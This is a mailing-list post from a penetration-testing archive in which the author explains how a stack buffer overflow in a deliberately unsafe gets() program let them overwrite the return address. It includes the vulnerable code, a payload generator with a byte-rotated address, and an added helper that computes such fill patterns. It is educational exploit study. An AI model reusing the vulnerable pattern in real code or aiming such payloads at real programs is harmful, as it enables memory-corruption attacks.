Penetration Testing mailing list archives

Re: Re: Controling the eip
From: wymerzp () sbu edu
Date: 16 May 2007 04:10:59 -0000

Hello all, thank you for your responses!
I finally figured out the problem. It was rather interesting, so I figured that I would share in more detail.
Firstly the "program" to be exploited:
#include <stdio.h>
/* Deliberately unsafe: gets() has no bounds check, so input longer than array[] overruns it and the saved registers above it. */
void return_input(void){
        char array[30];
        gets (array);
        printf("%s\n", array);
}
int main(void){
        return_input();
        return 0;
}
Secondly the new code to produce the ASCII characters of the address to be jumped to:
#include <stdio.h>
#include <stdint.h>
int main(void){
    int i=0;
    char stuffing[40];
    /* 4-byte stores (long was 4 bytes on the 32-bit x86 used here; uint32_t keeps that on any host).
       The last store at i=36 fills bytes 36..39, so the 40-byte buffer is not overrun. */
    for (i=0; i<=36; i+=4)
        *(uint32_t *) &stuffing[i] = 0x84050804;
    fwrite(stuffing, 1, sizeof stuffing, stdout); /* raw bytes, not %s: there is no terminator */
    return 0;
}
The interesting thing is that the address being placed in stuffing is not the address that I would like to jump to; 
that is 0x08048405. The reason for this is the buffer size. When I disassembled the function it had a buffer size of 
0x24 (in the book it was 0x20) 0x24 in decimal is 36. So, when I was writing to the EIP I was putting the last half of 
the address onto the EIP 4 bytes (I believe, it's been a while since Computer Organization) and then the second half. 
This is because of 36 not being cleanly divisible by 8 (i.e. 8 % 36 != 0). I, in my relative 'n00b-ness' found this 
rather interesting and was elated when I found out the source of my troubles.
Thanks for all who responded!
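As an added illustration (not part of the original post), the C helper below shows why the value the author had to write is a byte-rotated form of the target address: a 4-byte-periodic fill that starts at buffer offset 0 is read out of phase by any 4-byte slot whose offset is not a multiple of 4, so on little-endian x86 the bytes 04 08 05 84 of 0x84050804 are seen as 05 84 04 08, i.e. 0x08048405, by a slot at an offset of 2 mod 4. The function names value_seen_at and pattern_for, and the slot offsets used in main, are assumptions of this example; the post does not state where the saved return address sat.

```c
#include <stdint.h>
#include <stdio.h>

/* Fill buf with `pattern` stored little-endian every 4 bytes, as the post's
 * loop does, using byte stores so the result is host-endianness independent. */
static void fill_pattern(uint8_t *buf, size_t len, uint32_t pattern) {
    for (size_t i = 0; i < len; i++)
        buf[i] = (uint8_t)(pattern >> (8 * (i % 4)));
}

/* The little-endian 32-bit value a 4-byte slot starting at `offset` holds
 * when the buffer around it was filled with `pattern`. Read back from a real
 * filled buffer to mirror what the CPU sees when it loads a saved address. */
uint32_t value_seen_at(uint32_t pattern, size_t offset) {
    uint8_t buf[64];                       /* constructed scratch buffer */
    fill_pattern(buf, sizeof buf, pattern);
    size_t k = offset % 4;                 /* only the phase matters */
    return (uint32_t)buf[k] | (uint32_t)buf[k + 1] << 8
         | (uint32_t)buf[k + 2] << 16 | (uint32_t)buf[k + 3] << 24;
}

/* Inverse: the pattern to fill with so that the slot at `offset` reads as
 * `target`. A phase of k bytes rotates the value by 8*k bits, so undo it. */
uint32_t pattern_for(uint32_t target, size_t offset) {
    unsigned r = (unsigned)(8 * (offset % 4));
    return r ? (target << r) | (target >> (32 - r)) : target;
}

int main(void) {
    const uint32_t target = 0x08048405u;   /* address from the post */
    for (size_t off = 36; off <= 43; off++)
        printf("slot at %2zu: fill with 0x%08x, reads back 0x%08x\n",
               off, pattern_for(target, off),
               value_seen_at(pattern_for(target, off), off));
    return 0;
}
```

The row for offset 38 (or 42) reproduces the author's 0x84050804; offsets 40 and 36 need no rotation at all, which is why a cleanly aligned buffer hides this effect.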
